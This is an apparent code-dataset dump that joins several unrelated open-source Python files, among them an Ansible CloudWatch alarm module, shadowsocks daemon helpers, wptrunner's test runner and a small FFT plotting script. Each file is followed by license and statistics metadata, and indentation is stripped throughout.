- Name of the appropriate namespace ('AWS/EC2', 'System/Linux', etc.), which determines the category it will appear under in cloudwatch
required: false
statistic:
description:
- Operation applied to the metric
- Works in conjunction with period and evaluation_periods to determine the comparison value
required: false
choices: ['SampleCount','Average','Sum','Minimum','Maximum']
comparison:
description:
- Determines how the threshold value is compared
required: false
choices: ['<=','<','>','>=']
threshold:
description:
- Sets the min/max bound for triggering the alarm
required: false
period:
description:
- The time (in seconds) between metric evaluations
required: false
evaluation_periods:
description:
- The number of times in which the metric is evaluated before final calculation
required: false
unit:
description:
- The threshold's unit of measurement
required: false
choices:
- 'Seconds'
- 'Microseconds'
- 'Milliseconds'
- 'Bytes'
- 'Kilobytes'
- 'Megabytes'
- 'Gigabytes'
- 'Terabytes'
- 'Bits'
- 'Kilobits'
- 'Megabits'
- 'Gigabits'
- 'Terabits'
- 'Percent'
- 'Count'
- 'Bytes/Second'
- 'Kilobytes/Second'
- 'Megabytes/Second'
- 'Gigabytes/Second'
- 'Terabytes/Second'
- 'Bits/Second'
- 'Kilobits/Second'
- 'Megabits/Second'
- 'Gigabits/Second'
- 'Terabits/Second'
- 'Count/Second'
- 'None'
description:
description:
- A longer description of the alarm
required: false
dimensions:
description:
- Describes to what the alarm is applied
required: false
alarm_actions:
description:
- A list of the names action(s) taken when the alarm is in the 'alarm' status, denoted as Amazon Resource Name(s)
required: false
insufficient_data_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'insufficient_data' status
required: false
ok_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'ok' status, denoted as Amazon Resource Name(s)
required: false
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
- name: create alarm
ec2_metric_alarm:
state: present
region: ap-southeast-2
name: "cpu-low"
metric: "CPUUtilization"
namespace: "AWS/EC2"
statistic: Average
comparison: "<="
threshold: 5.0
period: 300
evaluation_periods: 3
unit: "Percent"
description: "This will alarm when a bamboo slave's cpu usage average is lower than 5% for 15 minutes "
dimensions: {'InstanceId':'i-XXX'}
alarm_actions: ["action1","action2"]
- name: Create an alarm to recover a failed instance
ec2_metric_alarm:
state: present
region: us-west-1
name: "recover-instance"
metric: "StatusCheckFailed_System"
namespace: "AWS/EC2"
statistic: "Minimum"
comparison: ">="
threshold: 1.0
period: 60
evaluation_periods: 2
unit: "Count"
description: "This will recover an instance when it fails"
dimensions: {"InstanceId":'i-XXX'}
alarm_actions: ["arn:aws:automate:us-west-1:ec2:recover"]
'''
try:
import boto.ec2.cloudwatch
from boto.ec2.cloudwatch import MetricAlarm
from boto.exception import BotoServerError, NoAuthHandlerFound
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (AnsibleAWSError, HAS_BOTO, connect_to_aws, ec2_argument_spec,
get_aws_connection_info)
def create_metric_alarm(connection, module):
name = module.params.get('name')
metric = module.params.get('metric')
namespace = module.params.get('namespace')
statistic = module.params.get('statistic')
comparison = module.params.get('comparison')
threshold = module.params.get('threshold')
period = module.params.get('period')
evaluation_periods = module.params.get('evaluation_periods')
unit = module.params.get('unit')
description = module.params.get('description')
dimensions = module.params.get('dimensions')
alarm_actions = module.params.get('alarm_actions')
insufficient_data_actions = module.params.get('insufficient_data_actions')
ok_actions = module.params.get('ok_actions')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if not alarms:
alm = MetricAlarm(
name=name,
metric=metric,
namespace=namespace,
statistic=statistic,
comparison=comparison,
threshold=threshold,
period=period,
evaluation_periods=evaluation_periods,
unit=unit,
description=description,
dimensions=dimensions,
alarm_actions=alarm_actions,
insufficient_data_actions=insufficient_data_actions,
ok_actions=ok_actions
)
try:
connection.create_alarm(alm)
changed = True
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to create alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
else:
alarm = alarms[0]
changed = False
for attr in ('comparison', 'metric', 'namespace', 'statistic', 'threshold', 'period', 'evaluation_periods', 'unit', 'description'):
if getattr(alarm, attr) != module.params.get(attr):
changed = True
setattr(alarm, attr, module.params.get(attr))
# this is to deal with a current bug where you cannot assign '<=>' to the comparator when modifying an existing alarm
comparison = alarm.comparison
comparisons = {'<=': 'LessThanOrEqualToThreshold', '<': 'LessThanThreshold', '>=': 'GreaterThanOrEqualToThreshold', '>': 'GreaterThanThreshold'}
alarm.comparison = comparisons[comparison]
dim1 = module.params.get('dimensions')
dim2 = alarm.dimensions
for keys in dim1:
if not isinstance(dim1[keys], list):
dim1[keys] = [dim1[keys]]
if keys not in dim2 or dim1[keys] != dim2[keys]:
changed = True
setattr(alarm, 'dimensions', dim1)
for attr in ('alarm_actions', 'insufficient_data_actions', 'ok_actions'):
action = module.params.get(attr) or []
# Boto and/or ansible may provide same elements in lists but in different order.
# Compare on sets since they do not need any order.
if set(getattr(alarm, attr)) != set(action):
changed = True
setattr(alarm, attr, module.params.get(attr))
try:
if changed:
connection.create_alarm(alarm)
except BotoServerError as e:
module.fail_json(msg=str(e))
result = alarms[0]
module.exit_json(changed=changed, name=result.name,
actions_enabled=result.actions_enabled,
alarm_actions=result.alarm_actions,
alarm_arn=result.alarm_arn,
comparison=result.comparison,
description=result.description,
dimensions=result.dimensions,
evaluation_periods=result.evaluation_periods,
insufficient_data_actions=result.insufficient_data_actions,
last_updated=result.last_updated,
metric=result.metric,
namespace=result.namespace,
ok_actions=result.ok_actions,
period=result.period,
state_reason=result.state_reason,
state_value=result.state_value,
statistic=result.statistic,
threshold=result.threshold,
unit=result.unit)
def delete_metric_alarm(connection, module):
name = module.params.get('name')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if alarms:
try:
connection.delete_alarms([name])
module.exit_json(changed=True)
except BotoServerError as e:
module.fail_json(msg=str(e))
else:
module.exit_json(changed=False)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(required=True, type='str'),
metric=dict(type='str'),
namespace=dict(type='str'),
statistic=dict(type='str', choices=['SampleCount', 'Average', 'Sum', 'Minimum', 'Maximum']),
comparison=dict(type='str', choices=['<=', '<', '>', '>=']),
threshold=dict(type='float'),
period=dict(type='int'),
unit=dict(type='str', choices=['Seconds', 'Microseconds', 'Milliseconds', 'Bytes', 'Kilobytes', 'Megabytes', 'Gigabytes', 'Terabytes',
'Bits', 'Kilobits', 'Megabits', 'Gigabits', 'Terabits', 'Percent', 'Count', 'Bytes/Second', 'Kilobytes/Second',
'Megabytes/Second', 'Gigabytes/Second', 'Terabytes/Second', 'Bits/Second', 'Kilobits/Second', 'Megabits/Second',
'Gigabits/Second', 'Terabits/Second', 'Count/Second', 'None']),
evaluation_periods=dict(type='int'),
description=dict(type='str'),
dimensions=dict(type='dict', default={}),
alarm_actions=dict(type='list'),
insufficient_data_actions=dict(type='list'),
ok_actions=dict(type='list'),
state=dict(default='present', choices=['present', 'absent']),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.ec2.cloudwatch, region, **aws_connect_params)
except (NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
if state == 'present':
create_metric_alarm(connection, module)
elif state == 'absent':
delete_metric_alarm(connection, module)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,040,837,811,964,048,900 | 35.423188 | 155 | 0.587617 | false |
ulnic/weatherSensor | data/ConfigurationReader.py | 1 | 2775 | #!/usr/bin/python
"""
Configuration Handler
"""
import logging
# noinspection PyCompatibility
import ConfigParser
import data.Constants
logger = logging.getLogger(data.Constants.Constant.LOGGER_NAME)
class ConfigurationReader(object):
"""
Class handling the configuration parser from the configuration.ini file
"""
def __init__(self):
logger.info('Reading configurations from file')
self.parser = ConfigParser.SafeConfigParser()
self.parser.read(data.Constants.Constant.CONFIG_FILE_NAME)
def get_key_in_section(self, _section_name, _key_name):
"""
Retrieves the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The value from the KEY inside the SECTION
"""
return self.parser.get(_section_name, _key_name)
def get_bool_key_in_section(self, _section_name, _key_name):
"""
Retrieves and converts to INTEGER, the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The INTEGER value from the KEY inside the SECTION
"""
return self.parser.getboolean(_section_name, _key_name)
def get_int_key_in_section(self, _section_name, _key_name):
"""
Retrieves and converts to BOOLEAN, the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The BOOLEAN value from the KEY inside the SECTION
"""
return self.parser.getint(_section_name, _key_name)
def get_all_section_names(self):
"""
Returns a list of config section names.
:return: List of all found sections in configuration.ini file.
"""
return [m for m in self.parser.sections()]
def has_sensor_section(self, _section_name):
"""
Queries the config file and return bool indicating if section found
:param _section_name: Section to search for
:return: BOOL indicating if the section was found
"""
return self.parser.has_section(_section_name)
def get_sensor_keys(self, _section_name):
"""
Retrieves all sensor keys under the section
:param _section_name: Section in config file to get keys from
:return: List of found key-values
"""
key_value_dict = {}
for name, value in self.parser.items(_section_name):
key_value_dict[name] = value
return key_value_dict
| mit | 3,018,315,172,325,340,700 | 36 | 106 | 0.654054 | false |
rodrigc/buildbot | master/buildbot/test/unit/util/test_netstrings.py | 6 | 1708 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.protocols import basic
from twisted.trial import unittest
from buildbot.util import netstrings
class NetstringParser(unittest.TestCase):
def test_valid_netstrings(self):
p = netstrings.NetstringParser()
p.feed("5:hello,5:world,")
self.assertEqual(p.strings, [b'hello', b'world'])
def test_valid_netstrings_byte_by_byte(self):
# (this is really testing twisted's support, but oh well)
p = netstrings.NetstringParser()
[p.feed(c) for c in "5:hello,5:world,"]
self.assertEqual(p.strings, [b'hello', b'world'])
def test_invalid_netstring(self):
p = netstrings.NetstringParser()
with self.assertRaises(basic.NetstringParseError):
p.feed("5-hello!")
def test_incomplete_netstring(self):
p = netstrings.NetstringParser()
p.feed("11:hello world,6:foob")
# note that the incomplete 'foobar' does not appear here
self.assertEqual(p.strings, [b'hello world'])
| gpl-2.0 | 1,147,959,568,604,553,000 | 36.955556 | 79 | 0.706089 | false |
kigawas/shadowsocks | shadowsocks/daemon.py | 694 | 5602 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIGHUP, signal.SIG_IGN)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
| apache-2.0 | -997,238,483,029,674,400 | 25.932692 | 79 | 0.582114 | false |
simartin/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/wptrunner.py | 1 | 18782 | from __future__ import print_function, unicode_literals
import json
import os
import sys
from six import iteritems, itervalues
import wptserve
from wptserve import sslutils
from . import environment as env
from . import instruments
from . import mpcontext
from . import products
from . import testloader
from . import wptcommandline
from . import wptlogging
from . import wpttest
from mozlog import capture, handlers
from .font import FontInstaller
from .testrunner import ManagerGroup
from .browsers.base import NullBrowser
here = os.path.dirname(__file__)
logger = None
"""Runner for web-platform-tests
The runner has several design goals:
* Tests should run with no modification from upstream.
* Tests should be regarded as "untrusted" so that errors, timeouts and even
crashes in the tests can be handled without failing the entire test run.
* For performance tests can be run in multiple browsers in parallel.
The upstream repository has the facility for creating a test manifest in JSON
format. This manifest is used directly to determine which tests exist. Local
metadata files are used to store the expected test results.
"""
def setup_logging(*args, **kwargs):
global logger
logger = wptlogging.setup(*args, **kwargs)
return logger
def get_loader(test_paths, product, debug=None, run_info_extras=None, chunker_kwargs=None,
test_groups=None, **kwargs):
if run_info_extras is None:
run_info_extras = {}
run_info = wpttest.get_run_info(kwargs["run_info"], product,
browser_version=kwargs.get("browser_version"),
browser_channel=kwargs.get("browser_channel"),
verify=kwargs.get("verify"),
debug=debug,
extras=run_info_extras,
enable_webrender=kwargs.get("enable_webrender"))
test_manifests = testloader.ManifestLoader(test_paths, force_manifest_update=kwargs["manifest_update"],
manifest_download=kwargs["manifest_download"]).load()
manifest_filters = []
include = kwargs["include"]
if test_groups:
include = testloader.update_include_for_groups(test_groups, include)
if include or kwargs["exclude"] or kwargs["include_manifest"] or kwargs["default_exclude"]:
manifest_filters.append(testloader.TestFilter(include=include,
exclude=kwargs["exclude"],
manifest_path=kwargs["include_manifest"],
test_manifests=test_manifests,
explicit=kwargs["default_exclude"]))
ssl_enabled = sslutils.get_cls(kwargs["ssl_type"]).ssl_enabled
h2_enabled = wptserve.utils.http2_compatible()
test_loader = testloader.TestLoader(test_manifests,
kwargs["test_types"],
run_info,
manifest_filters=manifest_filters,
chunk_type=kwargs["chunk_type"],
total_chunks=kwargs["total_chunks"],
chunk_number=kwargs["this_chunk"],
include_https=ssl_enabled,
include_h2=h2_enabled,
include_quic=kwargs["enable_quic"],
skip_timeout=kwargs["skip_timeout"],
skip_implementation_status=kwargs["skip_implementation_status"],
chunker_kwargs=chunker_kwargs)
return run_info, test_loader
def list_test_groups(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for item in sorted(test_loader.groups(kwargs["test_types"])):
print(item)
def list_disabled(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
rv = []
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test_type, tests in iteritems(test_loader.disabled_tests):
for test in tests:
rv.append({"test": test.id, "reason": test.disabled()})
print(json.dumps(rv, indent=2))
def list_tests(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test in test_loader.test_ids:
print(test)
def get_pause_after_test(test_loader, **kwargs):
if kwargs["pause_after_test"] is None:
if kwargs["repeat_until_unexpected"]:
return False
if kwargs["headless"]:
return False
if kwargs["debug_test"]:
return True
tests = test_loader.tests
is_single_testharness = (sum(len(item) for item in itervalues(tests)) == 1 and
len(tests.get("testharness", [])) == 1)
if kwargs["repeat"] == 1 and kwargs["rerun"] == 1 and is_single_testharness:
return True
return False
return kwargs["pause_after_test"]
def run_tests(config, test_paths, product, **kwargs):
"""Set up the test environment, load the list of tests to be executed, and
invoke the remainder of the code to execute tests"""
mp = mpcontext.get_context()
if kwargs["instrument_to_file"] is None:
recorder = instruments.NullInstrument()
else:
recorder = instruments.Instrument(kwargs["instrument_to_file"])
with recorder as recording, capture.CaptureIO(logger,
not kwargs["no_capture_stdio"],
mp_context=mp):
recording.set(["startup"])
env.do_delayed_imports(logger, test_paths)
product = products.load_product(config, product, load_cls=True)
env_extras = product.get_env_extras(**kwargs)
product.check_args(**kwargs)
if kwargs["install_fonts"]:
env_extras.append(FontInstaller(
logger,
font_dir=kwargs["font_dir"],
ahem=os.path.join(test_paths["/"]["tests_path"], "fonts/Ahem.ttf")
))
recording.set(["startup", "load_tests"])
test_groups = (testloader.TestGroupsFile(logger, kwargs["test_groups_file"])
if kwargs["test_groups_file"] else None)
(test_source_cls,
test_source_kwargs,
chunker_kwargs) = testloader.get_test_src(logger=logger,
test_groups=test_groups,
**kwargs)
run_info, test_loader = get_loader(test_paths,
product.name,
run_info_extras=product.run_info_extras(**kwargs),
chunker_kwargs=chunker_kwargs,
test_groups=test_groups,
**kwargs)
logger.info("Using %i client processes" % kwargs["processes"])
skipped_tests = 0
test_total = 0
unexpected_total = 0
if len(test_loader.test_ids) == 0 and kwargs["test_list"]:
logger.critical("Unable to find any tests at the path(s):")
for path in kwargs["test_list"]:
logger.critical(" %s" % path)
logger.critical("Please check spelling and make sure there are tests in the specified path(s).")
return False
kwargs["pause_after_test"] = get_pause_after_test(test_loader, **kwargs)
ssl_config = {"type": kwargs["ssl_type"],
"openssl": {"openssl_binary": kwargs["openssl_binary"]},
"pregenerated": {"host_key_path": kwargs["host_key_path"],
"host_cert_path": kwargs["host_cert_path"],
"ca_cert_path": kwargs["ca_cert_path"]}}
testharness_timeout_multipler = product.get_timeout_multiplier("testharness",
run_info,
**kwargs)
mojojs_path = kwargs["mojojs_path"] if kwargs["enable_mojojs"] else None
recording.set(["startup", "start_environment"])
with env.TestEnvironment(test_paths,
testharness_timeout_multipler,
kwargs["pause_after_test"],
kwargs["debug_test"],
kwargs["debug_info"],
product.env_options,
ssl_config,
env_extras,
kwargs["enable_quic"],
mojojs_path) as test_environment:
recording.set(["startup", "ensure_environment"])
try:
test_environment.ensure_started()
except env.TestEnvironmentError as e:
logger.critical("Error starting test environment: %s" % e.message)
raise
recording.set(["startup"])
repeat = kwargs["repeat"]
repeat_count = 0
repeat_until_unexpected = kwargs["repeat_until_unexpected"]
while repeat_count < repeat or repeat_until_unexpected:
repeat_count += 1
if repeat_until_unexpected:
logger.info("Repetition %i" % (repeat_count))
elif repeat > 1:
logger.info("Repetition %i / %i" % (repeat_count, repeat))
test_count = 0
unexpected_count = 0
tests = []
for test_type in test_loader.test_types:
tests.extend(test_loader.tests[test_type])
try:
test_groups = test_source_cls.tests_by_group(tests, **test_source_kwargs)
except Exception:
logger.critical("Loading tests failed")
return False
logger.suite_start(test_groups,
name='web-platform-test',
run_info=run_info,
extra={"run_by_dir": kwargs["run_by_dir"]})
for test_type in kwargs["test_types"]:
logger.info("Running %s tests" % test_type)
# WebDriver tests may create and destroy multiple browser
# processes as part of their expected behavior. These
# processes are managed by a WebDriver server binary. This
# obviates the need for wptrunner to provide a browser, so
# the NullBrowser is used in place of the "target" browser
if test_type == "wdspec":
browser_cls = NullBrowser
else:
browser_cls = product.browser_cls
browser_kwargs = product.get_browser_kwargs(logger,
test_type,
run_info,
config=test_environment.config,
num_test_groups=len(test_groups),
**kwargs)
executor_cls = product.executor_classes.get(test_type)
executor_kwargs = product.get_executor_kwargs(logger,
test_type,
test_environment.config,
test_environment.cache_manager,
run_info,
**kwargs)
if executor_cls is None:
logger.error("Unsupported test type %s for product %s" %
(test_type, product.name))
continue
for test in test_loader.disabled_tests[test_type]:
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
if test_type == "testharness":
run_tests = {"testharness": []}
for test in test_loader.tests["testharness"]:
if ((test.testdriver and not executor_cls.supports_testdriver) or
(test.jsshell and not executor_cls.supports_jsshell)):
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
else:
run_tests["testharness"].append(test)
else:
run_tests = test_loader.tests
recording.pause()
with ManagerGroup("web-platform-tests",
kwargs["processes"],
test_source_cls,
test_source_kwargs,
browser_cls,
browser_kwargs,
executor_cls,
executor_kwargs,
kwargs["rerun"],
kwargs["pause_after_test"],
kwargs["pause_on_unexpected"],
kwargs["restart_on_unexpected"],
kwargs["debug_info"],
not kwargs["no_capture_stdio"],
recording=recording) as manager_group:
try:
manager_group.run(test_type, run_tests)
except KeyboardInterrupt:
logger.critical("Main thread got signal")
manager_group.stop()
raise
test_count += manager_group.test_count()
unexpected_count += manager_group.unexpected_count()
recording.set(["after-end"])
test_total += test_count
unexpected_total += unexpected_count
logger.info("Got %i unexpected results" % unexpected_count)
logger.suite_end()
if repeat_until_unexpected and unexpected_total > 0:
break
if repeat_count == 1 and len(test_loader.test_ids) == skipped_tests:
break
if test_total == 0:
if skipped_tests > 0:
logger.warning("All requested tests were skipped")
else:
if kwargs["default_exclude"]:
logger.info("No tests ran")
return True
else:
logger.critical("No tests ran")
return False
if unexpected_total and not kwargs["fail_on_unexpected"]:
logger.info("Tolerating %s unexpected results" % unexpected_total)
return True
return unexpected_total == 0
def check_stability(**kwargs):
from . import stability
if kwargs["stability"]:
logger.warning("--stability is deprecated; please use --verify instead!")
kwargs['verify_max_time'] = None
kwargs['verify_chaos_mode'] = False
kwargs['verify_repeat_loop'] = 0
kwargs['verify_repeat_restart'] = 10 if kwargs['repeat'] == 1 else kwargs['repeat']
kwargs['verify_output_results'] = True
return stability.check_stability(logger,
max_time=kwargs['verify_max_time'],
chaos_mode=kwargs['verify_chaos_mode'],
repeat_loop=kwargs['verify_repeat_loop'],
repeat_restart=kwargs['verify_repeat_restart'],
output_results=kwargs['verify_output_results'],
**kwargs)
def start(**kwargs):
assert logger is not None
logged_critical = wptlogging.LoggedAboveLevelHandler("CRITICAL")
handler = handlers.LogLevelFilter(logged_critical, "CRITICAL")
logger.add_handler(handler)
rv = False
try:
if kwargs["list_test_groups"]:
list_test_groups(**kwargs)
elif kwargs["list_disabled"]:
list_disabled(**kwargs)
elif kwargs["list_tests"]:
list_tests(**kwargs)
elif kwargs["verify"] or kwargs["stability"]:
rv = check_stability(**kwargs) or logged_critical.has_log
else:
rv = not run_tests(**kwargs) or logged_critical.has_log
finally:
logger.remove_handler(handler)
return rv
def main():
"""Main entry point when calling from the command line"""
kwargs = wptcommandline.parse_args()
try:
if kwargs["prefs_root"] is None:
kwargs["prefs_root"] = os.path.abspath(os.path.join(here, "prefs"))
setup_logging(kwargs, {"raw": sys.stdout})
return start(**kwargs)
except Exception:
if kwargs["pdb"]:
import pdb
import traceback
print(traceback.format_exc())
pdb.post_mortem()
else:
raise
| mpl-2.0 | 9,151,762,934,626,529,000 | 41.979405 | 108 | 0.496007 | false |
boddmg/dsp-playground | experiment.py | 1 | 2717 | from matplotlib import pyplot as plt
import numpy as np
import math
import pickle
from scipy import signal
from numpy.fft import rfft, irfft
from numpy import argmax, sqrt, mean, absolute, arange, log10
from scipy.signal import blackmanharris
import thdn
def single_frequency_filter(input_signal):
y_f_all = np.fft.fft(input_signal)
y_f_all[:1] = np.array([0] *1)
y_f_half = y_f_all[:len(y_f_all) / 2]
y_f_abs = np.abs(y_f_half)
y_f_max = max(y_f_abs)
y_f_max_index = np.where(y_f_abs == y_f_max)[0][0]
print(y_f_max_index)
y_f_all[:y_f_max_index] = [0] * (y_f_max_index)
y_f_all[y_f_max_index+1:] = [0] * (len(y_f_all)-y_f_max_index-1)
y_filtered = np.fft.ifft(y_f_all)
return y_filtered
FS = 204.8
BASE_FREQUENCY = 50.0
FILTER_SAMPLE_PURE = int(2*1/BASE_FREQUENCY * FS) # 2T
FILTER_SAMPLE_ALL = 2048
DF = FS/FILTER_SAMPLE_ALL
print(DF)
filter_buffer = []
def single_filter(x):
return x
def main():
import json
# get data
data = json.load(open("data.txt", "r"))
# y = np.concatenate((np.load("data.pkl")[:256], np.array([0] * (600 - 256))))
# y = np.concatenate((np.load("data.pkl")[:], [0]*6000))
y = np.array(data["Y"])
# y = signal.resample(y, 5000)
# fs = 5000.0 * (10000/200)
fs = 1 / data["dt"]
print("fs:\t", fs)
time = len(y)/fs # in seconds
x = np.arange(0, time, 1/fs)
# x = x[:-1]
# for i in meta_data:
# print(i, meta_data[i])
print("time",time)
end = 40
f = x[:end]
f = f * fs / time
# Add the noise
# y = y.clip(-10, 7)
# y += (np.sin(x * 5) * 2).clip (-0.3, 0.8)
# y += np.random.uniform(size=len(y))
plt.subplot(231)
plt.plot(x, y, 'r')
plt.subplot(232)
y_filtered = y.tolist()
y_list = y.tolist()
for i in range(len(y_list)):
y_filtered[i] = single_filter(y_list[i])
y_filtered = np.array(y_filtered)
# y_filtered = single_frequency_filter(y)*10
# filter_function = np.array(([0] * 6 + [1] + [0] * (600 - 7)))
# filter_function = np.fft.ifft(filter_function)
# y_filtered = np.fft.ifft(y_f * filter_function)
# y_filtered = np.convolve(y_filtered, filter_function, mode='same')
# y_filtered = np.sin(x*np.pi*2* )*10
plt.plot(x, y_filtered, "b")
plt.subplot(233)
plt.plot(x[:end], y[:end], "r", x[:end], y_filtered[:end], "b")
plt.subplot(234)
y = np.abs(np.fft.fft(y))
y = y[:end]
plt.plot(f, y)
plt.subplot(235)
y_filtered = np.abs(np.fft.fft(y_filtered))
y_filtered = y_filtered[:end]
plt.plot(f, y_filtered)
plt.subplot(236)
plt.plot(f, y, 'r', f, y_filtered, 'b')
plt.show()
if __name__ == '__main__':
main()
| mit | 7,088,321,069,531,969,000 | 24.87619 | 82 | 0.57085 | false |
sidzan/netforce | netforce_general/netforce_general/set_module_version.py | 2 | 1178 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
